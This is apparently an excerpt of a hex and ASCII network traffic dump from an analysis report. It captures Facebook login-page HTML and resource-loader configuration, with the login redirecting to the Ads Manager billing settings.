                                                                                    Data Ascii: 945v0V1JViVUvoFrAUXkROECw1b6rTvVGoOtEsz83vGNDfouUa9X1qI_KtG1Xz980d2lhv2YJLx_ila9I"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa2Ty_ujNs945v0V1JViVUvoFrAUXkROECw1b6rTvVGoOtEsz83vGNDfouUa9X1qI_KtG1Xz9
                                                                                    2023-02-07 18:46:02 UTC943INData Raw: 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 62 6f 6f 73 74 22 3a 7b 7d 2c 22 65 76 65 6e 74 5f 74 79 70 65 73 22 3a 7b 7d 2c 22 6d 61 6e 75 61 6c 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 70 72 6f 66 69 6c 65 5f 65 61 67 65 72 5f 65 78 65 63 75 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 64 69 73 61 62 6c 65 5f 68 65 75 72 69 73
                                                                                    Data Ascii: :0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_instrumentation":false,"profile_eager_execution":false,"disable_heuris
                                                                                    2023-02-07 18:46:02 UTC944INData Raw: 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 37 35 37 39 35 35 36 32 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 34 5f 54 50 22 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 20 64 61 74 61 2d 72 65 66 65 72 72 65 72 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 3e 3c 64 69 76 20 69 64 3d 22 62 6c 75 65 42 61 72 44 4f 4d 49 6e 73 70 65 63 74 6f 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 33 6a 68 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 67 65 64 6f 75 74 5f 6d 65 6e 75 62 61 72 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 6c 6f 67 67 65 64 6f
                                                                                    Data Ascii: ebSession"],function(j){j(1675795562)})</script><div class="_li" id="u_0_4_TP"><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><div id="blueBarDOMInspector"><div class="_53jh"><div class="loggedout_menubar_container"><div class="clearfix loggedo
                                                                                    2023-02-07 18:46:02 UTC946INData Raw: 62 65 6c 5f 66 69 65 6c 64 22 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 61 62 65 6c 5f 66 69 65 6c 64 22 3e 3c 64 69 76 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 2f 69 6e 69 74 69 61 74 65 3f 6c 77 76 3d 31 30 30 26 61 6d 70 3b 61 72 73 3d 72 6f 79 61 6c 5f 62 6c 75 65 5f 62 61 72 22 3e 46 6f 72 67 6f 74 20 61 63 63 6f 75 6e 74 3f 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f
                                                                                    Data Ascii: bel_field"></td><td class="login_form_label_field"><div><a href="https://www.facebook.com/recover/initiate?lwv=100&amp;ars=royal_blue_bar">Forgot account?</a></div></td></tr></table><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_
                                                                                    2023-02-07 18:46:02 UTC947INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 61 72 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 62 5f 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 20 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 55 49 46 75 6c 6c 50 61 67 65 5f 43 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 76 6c 20 70 74 6d 20 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 20 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 4c 61 72 67 65 20 75 69 42 6f 78 57 68 69 74 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 69 48
                                                                                    Data Ascii: div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div class="fb_content clearfix " id="content" role="main"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite"><div class="uiH
                                                                                    2023-02-07 18:46:02 UTC949INData Raw: 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 64 65 5f 44 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c
                                                                                    Data Ascii: kieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;,
                                                                                    2023-02-07 18:46:02 UTC950INData Raw: 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 70 74 5f 50 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65
                                                                                    Data Ascii: s%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_se
                                                                                    2023-02-07 18:46:02 UTC951INData Raw: 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 74 72 5f 54 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41
                                                                                    Data Ascii: in.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A
                                                                                    2023-02-07 18:46:02 UTC953INData Raw: 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20
                                                                                    Data Ascii: i><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;,
                                                                                    2023-02-07 18:46:02 UTC954INData Raw: 22 2f 70 6c 61 63 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 70 6f 70 75 6c 61 72 20 70 6c 61 63 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 6c 61 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 61 6d 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 67 61 6d 65 73 2e 22 3e 47 61 6d 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 61 72 6b 65 74 70 6c 61 63 65 2f 22 20 74 69 74 6c 65 3d 22 42 75 79 20 61 6e 64 20 73 65 6c 6c 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 20 4d 61 72 6b 65 74 70 6c 61 63 65 2e 22 3e 4d 61 72 6b 65 74 70 6c 61 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                    Data Ascii: "/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https:
                                                                                    2023-02-07 18:46:02 UTC956INData Raw: 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 6d 61 6e 61 67 65 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 72 6f 75 70 73 2f 65 78 70 6c 6f 72 65 2f 22 20 74 69 74 6c 65 3d 22 45 78 70 6c 6f 72 65 20 6f 75 72 20 47 72 6f 75 70 73 2e 22 3e 47 72 6f 75 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 6f 75 74 2e 6d 65 74 61 2e 63 6f 6d 2f 22 20 61 63 63 65 73 73 6b 65 79 3d 22 38 22
                                                                                    Data Ascii: enter/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8"
                                                                                    2023-02-07 18:46:02 UTC957INData Raw: 62 6c 65 5f 65 6c 65 6d 22 20 68 72 65 66 3d 22 2f 73 65 74 74 69 6e 67 73 22 20 74 69 74 6c 65 3d 22 56 69 65 77 20 61 6e 64 20 65 64 69 74 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 73 65 74 74 69 6e 67 73 2e 22 3e 53 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 61 63 63 65 73 73 6b 65 79 3d 22 37 22 20 63 6c 61 73 73 3d 22 61 63 63 65 73 73 69 62 6c 65 5f 65 6c 65 6d 22 20 68 72 65 66 3d 22 2f 61 6c 6c 61 63 74 69 76 69 74 79 3f 70 72 69 76 61 63 79 5f 73 6f 75 72 63 65 3d 61 63 74 69 76 69 74 79 5f 6c 6f 67 5f 74 6f 70 5f 6d 65 6e 75 22 20 74 69 74 6c 65 3d 22 56 69 65 77 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6c 6f 67 22 3e 41 63 74 69 76 69 74 79 20 6c 6f 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e
                                                                                    Data Ascii: ble_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div>
                                                                                    2023-02-07 18:46:02 UTC959INData Raw: 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 44 75 6f 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 36 30 34 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6b 6c 79 32 4c 53 5a 56 5f 44 4b 47 52 39 4f 67 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c
                                                                                    Data Ascii: "result":false,"hash":"AT5GsH9Kb-3W-taZDuo"},"5541":{"result":true,"hash":"AT70V-Q_zfEykznO604"},"1099893":{"result":false,"hash":"AT5kly2LSZV_DKGR9Og"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayl
                                                                                    2023-02-07 18:46:02 UTC960INData Raw: 70 5c 2f 76 33 69 67 42 45 34 5c 2f 79 52 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 75 4d 4d 63 4d 53 57 4a 6f 6d 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 66 6f 7a 37 6e 77 37 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 58 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 57 59 43 36 4c 62 61 6d 51 55 64 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 43 55 70 44 4d 65 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66
                                                                                    Data Ascii: p\/v3igBE4\/yR\/l\/en_US\/uMMcMSWJomI.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"foz7nw7":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yX\/l\/en_US\/WYC6LbamQUd.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"CUpDMe1":{"type":"js","src":"https:\/\/static.xx.f
                                                                                    2023-02-07 18:46:02 UTC962INData Raw: 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 72 5c 2f 41 54 63 75 30 58 67 55 44 66 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 55 66 71 36 59 57 58 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6a 5c 2f 72 5c 2f 2d 6a 59 37 53 71 62 5a 53 7a 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 37 54 56 58 70 4f 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f
                                                                                    Data Ascii: ps:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/ATcu0XgUDfP.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ufq6YWX":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yj\/r\/-jY7SqbZSzy.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"7TVXpOy":{"type":"js","src":"https:\/\/
                                                                                    2023-02-07 18:46:02 UTC963INData Raw: 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 72 68 32 54 6f 5c 2f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 46 65 32 34 5c 2f 79 70 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 72 6c 62 67 64 76 72 79 79 75 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 33 6d 63 36 79 62 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4e 5c 2f 72 5c 2f 34 64 71 6a 4b 4a 52 4c
                                                                                    Data Ascii: ?_nc_x=Ij3Wp8lg5Kz","nc":1},"orh2To\/":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iFe24\/yp\/l\/en_US\/rlbgdvryyuP.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"3mc6ybv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yN\/r\/4dqjKJRL
                                                                                    2023-02-07 18:46:02 UTC965INData Raw: 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 71 45 53 34 5c 2f 79 37 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 56 55 4d 2d 51 37 70 4d 44 66 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 7a 36 31 41 33 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 72 5c 2f 38 4a 69 66 30 6d 63 6a 38 7a 57 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 48 4e 34 67 55 69 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61
                                                                                    Data Ascii: x.fbcdn.net\/rsrc.php\/v3iqES4\/y7\/l\/en_US\/VUM-Q7pMDfO.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ez61A3Q":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/r\/8Jif0mcj8zW.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"HN4gUih":{"type":"js","src":"https:\/\/sta
                                                                                    2023-02-07 18:46:02 UTC966INData Raw: 68 47 53 42 6d 42 58 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 54 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 39 7a 72 5f 42 57 6a 31 5a 34 41 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 48 76 64 62 55 6f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 56 5c 2f 72 5c 2f 4b 34 4d 56 6b 36 4f 65 65 72 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a
                                                                                    Data Ascii: hGSBmBX":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yT\/l\/0,cross\/9zr_BWj1Z4A.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"+HvdbUo":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yV\/r\/K4MVk6Oeerl.js?_nc_x=Ij3Wp8lg5Kz","nc":
                                                                                    2023-02-07 18:46:02 UTC968INData Raw: 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 39 30 50 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 58 35 38 50 78 42 30 57 69 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 67 64 47 5a 31 6d 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 76 75 46 64 46 56 68 4b 36 5f 53 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 57 38 6f 4f 37 4b 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f
                                                                                    Data Ascii: net\/rsrc.php\/v3i90P4\/yz\/l\/en_US\/BX58PxB0Wia.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"gdGZ1mj":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/l\/0,cross\/vuFdFVhK6_S.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"W8oO7Kw":{"type":"js","src":"https:\/\/
                                                                                    2023-02-07 18:46:02 UTC969INData Raw: 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 47 5f 32 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 75 36 48 66 34 31 35 31 57 67 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 45 34 44 6f 66 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 72 5c 2f 45 65 6a 